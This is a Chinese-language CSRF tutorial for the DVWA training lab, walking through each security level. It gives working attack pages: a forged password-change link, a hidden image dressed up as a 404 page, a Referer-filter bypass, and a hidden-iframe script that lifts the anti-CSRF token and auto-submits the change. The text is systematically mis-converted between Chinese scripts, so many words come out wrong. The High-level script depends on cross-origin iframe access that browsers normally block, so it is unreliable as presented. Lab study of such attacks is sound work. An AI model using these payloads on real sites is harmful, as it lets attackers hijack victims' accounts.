CSRF（跨站請求僞造）

CSRF，全稱Cross-site request forgery，翻譯過來就是跨站請求僞造，是指利用受害者還沒有失效的身份認證信息（cookie、會話等），誘騙其點擊惡意連接或者訪問包含攻擊代碼的頁面，在受害人不知情的狀況下以受害者的身份向（身份認證信息所對應的）服務器發送請求，從而完成非法操做（如轉帳、改密等）。

CSRF與XSS最大的區別就在於，CSRF並無盜取cookie而是直接利用。

Low

能夠看到，服務器收到修改密碼的請求後，會檢查參數password_new與password_conf是否相同，若是相同，就會修改密碼，並無任何的防CSRF機制（固然服務器對請求的發送者是作了身份驗證的，是檢查的cookie，只是這裏的代碼沒有體現= =）。

抓包獲得，URL：

方法一：http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#

當用戶A在訪問該網站時，只要用戶A點擊黑客B精心構造的這個URL時就能形成CSRF攻擊

不能跨瀏覽器,例如以前用的火狐，如今不能用Chrome瀏覽器，由於chrome不會利用火狐的cookie。

固然，這個URL過於明顯，稍微有一點知識的人都能看出來這是一個改密碼的連接，因此說咱們就應該想一下隱藏的放法，

方法二：短連接來隱藏URL（點擊短連接，會自動跳轉到真實網站）

須要提醒的是，雖然利用了短連接隱藏url，但受害者最終仍是會看到密碼修改爲功的頁面，因此這種攻擊方法也並不高明。

方法三：構造攻擊頁面(html文檔)

現實攻擊場景下，這種方法須要事先在公網上傳一個攻擊頁面，誘騙受害者去訪問，真正可以在受害者不知情的狀況下完成CSRF攻擊。

文檔以下：

<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0"style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

其中style="display:none;"是不讓這個元素顯示出來

當受害者訪問test.html時，會誤認爲是本身點擊的是一個失效的url，但實際上已經遭受了CSRF攻擊，密碼已經被修改成了hack。

 

Medium

int eregi(string pattern, string string)

檢查string中是否含有pattern（不區分大小寫），若是有返回True，反之False。

能夠看到，Medium級別的代碼檢查了保留變量 HTTP_REFERER（http包頭的Referer參數的值，表示來源地址）中是否包含SERVER_NAME（http包頭的Host參數，及要訪問的主機名，這裏是192.168.0.104），但願經過這種機制抵禦CSRF攻擊。

漏洞利用

過濾規則是http包頭的Referer參數的值中必須包含主機名（這裏是192.168.0.104）

咱們能夠將攻擊頁面命名爲192.168.0.104.html（頁面被放置在攻擊者的服務器裏，這裏是10.4.253.2）就能夠繞過了

Referer參數完美繞過過濾規則

High

High級別的代碼加入了Anti-CSRF token機制，用戶每次訪問改密頁面時，服務器會返回一個隨機的token，向服務器發起請求時，須要提交token參數，而服務器在收到請求時，會優先檢查token，只有token正確，纔會處理客戶端的請求。

漏洞利用

要繞過High級別的反CSRF機制，關鍵是要獲取token，要利用受害者的cookie去修改密碼的頁面獲取關鍵的token。

試着去構造一個攻擊頁面，將其放置在攻擊者的服務器，引誘受害者訪問，從而完成CSRF攻擊，下面是代碼。

<script type="text/javascript">

function attack()

{

document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;

document.getElementById("transfer").submit();

}

</script>

 

<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">

</iframe>

 

<body onload="attack()">

<form method="GET" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/csrf">

<input type="hidden" name="password_new" value="password">

<input type="hidden" name="password_conf" value="password">

<input type="hidden" name="user_token" value="">

<input type="hidden" name="Change" value="Change">

</form>

</body>

 

Impossible

能夠看到，Impossible級別的代碼利用PDO技術防護SQL注入，至於防禦CSRF，則要求用戶輸入原始密碼（簡單粗暴），攻擊者在不知道原始密碼的狀況下，不管如何都沒法進行CSRF攻擊。